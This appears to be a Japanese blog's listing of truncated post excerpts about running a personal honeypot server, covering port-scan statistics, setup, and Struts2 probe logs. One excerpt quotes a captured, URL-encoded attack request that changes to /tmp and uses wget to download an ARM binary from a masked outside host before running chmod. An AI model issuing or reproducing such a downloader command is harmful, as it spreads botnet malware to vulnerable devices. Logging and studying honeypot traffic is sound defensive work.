ハニーポット用にたてているWebサーバー。 基本的にハニーポットに届く通信とサーバ管理用で必要な通信ポート以外ブロックをしてログに記録しております。 そこで、どんなサービスに対してスキャンが来ているのだろうと思い、ブロックされているポートと件数…

このブログを始めたころから、どうにかして「自分用のハニーポットをたてて生の攻撃見てみたい！」と思っていたのですが、Linuxの知識も大してなかったため「攻撃されるサーバなんぞ立てられるのか？？？」と、なかばあきらめておりました。 そうしたところ…

Struts2攻撃と思われるものに交じって、こんなのが来てました。 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%…

本日朝も以下のような探索ログが残っていました。 始めから終わりまで10秒間かけて順番に該当するものがあるか試してるみたいです。 Strutsってデフォルトこういうディレクトリ構成なの？？？（私は知見がないためわからないです） ちなみに発信元はドイツで…